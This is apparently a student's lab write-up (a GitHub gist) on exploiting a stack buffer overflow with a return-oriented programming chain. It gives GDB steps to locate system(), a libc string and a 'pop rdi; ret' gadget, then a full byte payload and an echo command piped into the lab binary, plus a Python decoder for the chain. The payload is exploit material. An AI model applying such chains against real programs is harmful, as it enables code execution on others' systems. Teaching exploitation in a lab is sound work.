@Wachiwi
Last active May 11, 2017 08:46
Lab 4

Preparation

Tasks 1-3 as described in the instructions, not much effort.

Note: malloc() places the data on the heap, but we want it on the stack, hence the use of [].

4. Analysis and "Reverse" Engineering

GDB internal commands:

gdb ./a.out
gdb$ b main # Create breakpoint for main function
gdb$ run # Start program
gdb$ info address system # lookup symbols in libc area
Symbol "system" is at 0x7fffff076590 in a file compiled without debugging.
gdb$ find "sl" libc # search for string in namespace libc
Searching for 'sl' in: libc ranges
Found 16 results, display max 16 items:
libc : 0x7fffff041149 --> 0x72637700746f6c73 ('slot')
libc : 0x7fffff04123c ("slog_chk")
libc : 0x7fffff041d4a --> 0x5f4f495f006c6c73 ('sll')
libc : 0x7fffff042296 --> 0x67007265776f6c73 ('slower')
libc : 0x7fffff042a88 --> 0x7473007065656c73 ('sleep')
libc : 0x7fffff042dec --> 0x635f726478006c73 ('sl')       # This one is the left one
libc : 0x7fffff0437aa ("slog_chk")
libc : 0x7fffff043827 --> 0x7773007065656c73 ('sleep')
libc : 0x7fffff04432a --> 0x695f5f006e656c73 ('slen')
libc : 0x7fffff044d71 ("slower_l")
libc : 0x7fffff04589d --> 0x735f5f00676f6c73 ('slog')
libc : 0x7fffff04626b --> 0x6d6d007065656c73 ('sleep')
# Desired address is 0x7fffff042dec
gdb$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400673 : (b'5fc3')  pop rdi; ret

Summary of all relevant information:

0x7fffff076590  # system address
0x7fffff042dec  # sl address
0x00400673      # pop address

5. Overflowing the program

Desired stack:

#0  main () at main.c:11
#1  0x0000000000400673 in __libc_csu_init ()
#2  0x00007fffff076590 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/x86_64-linux-gnu/libc.so.6
#3  0x0000000100000000 in ?? ()
#4  0x00000000004005bd in frame_dummy ()
#5  0x0000000000000000 in ?? ()

General Return-Oriented Programming layout of the overflow string:

#1  address of the pop gadget (overwrites the saved return address)
#2  value the gadget pops into the register (here the address of the 'sl' string)
#3  address of the function the gadget's ret jumps to (here system)

Solution information:

123456789012345678901234            # General overflow (24 chars on this build)
                                    # 8 byte format because 64bit machine
\x73\x06\x40\x00\x00\x00\x00\x00    # POP rdi; ret address in 8 byte format
\xec\x2d\x04\xff\xff\x7f\x00\x00    # 'sl' string address in 8 byte format
\x90\x65\x07\xff\xff\x7f\x00\x00    # address of system() in 8 byte format

Execute with:

echo -e "123456789012345678901234\x73\x06\x40\x00\x00\x00\x00\x00\xec\x2d\x04\xff\xff\x7f\x00\x00\x90\x65\x07\xff\xff\x7f\x00\x00" | ./a.out
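Added example (not part of the gist): the analyst's view of the input above. It unescapes the `echo -e` string, splits it into the 24-byte filler and 8-byte little-endian words, and checks each word against the three addresses from the summary, which verifies the byte order used in the write-up. The `KNOWN` table and the role labels are taken from this page; `PADDING` assumes the 24-character filler stated above.

```python
import re
import struct

# The overflow string exactly as passed to `echo -e` in the write-up.
PAYLOAD_ESCAPED = (
    r"123456789012345678901234"
    r"\x73\x06\x40\x00\x00\x00\x00\x00"
    r"\xec\x2d\x04\xff\xff\x7f\x00\x00"
    r"\x90\x65\x07\xff\xff\x7f\x00\x00"
)

# Addresses from the "Summary of all relevant information" section.
KNOWN = {
    0x00400673: "pop rdi; ret gadget (binary, fixed address: no PIE)",
    0x7FFFFF042DEC: "'sl' string (libc, fixed address: ASLR disabled)",
    0x7FFFFF076590: "system() (libc, fixed address: ASLR disabled)",
}

# Role of each 8-byte word after the filler, in the order the CPU consumes them.
ROLES = ["saved return address", "popped into rdi", "target of the gadget's ret"]

PADDING = 24  # assumed from the write-up: 24 filler bytes before the return address


def unescape(s: str) -> bytes:
    """Turn `echo -e` style \\xNN escapes into raw bytes; other characters are ASCII."""
    out = bytearray()
    for m in re.finditer(r"\\x([0-9a-fA-F]{2})|(.)", s):
        out.append(int(m.group(1), 16) if m.group(1) else ord(m.group(2)))
    return bytes(out)


def decode_chain(escaped: str, padding: int = PADDING) -> list:
    """Return [(address, role, label)] for every 8-byte little-endian word
    following the filler, labelling words that match the write-up's addresses."""
    raw = unescape(escaped)
    words = raw[padding:]
    if len(words) % 8:
        raise ValueError("chain is not a whole number of 8-byte words")
    chain = []
    for i, (addr,) in enumerate(struct.iter_unpack("<Q", words)):
        role = ROLES[i] if i < len(ROLES) else "extra word"
        chain.append((addr, role, KNOWN.get(addr, "unknown address")))
    return chain


if __name__ == "__main__":
    for addr, role, label in decode_chain(PAYLOAD_ESCAPED):
        print(f"0x{addr:016x}  {role:28s} {label}")
```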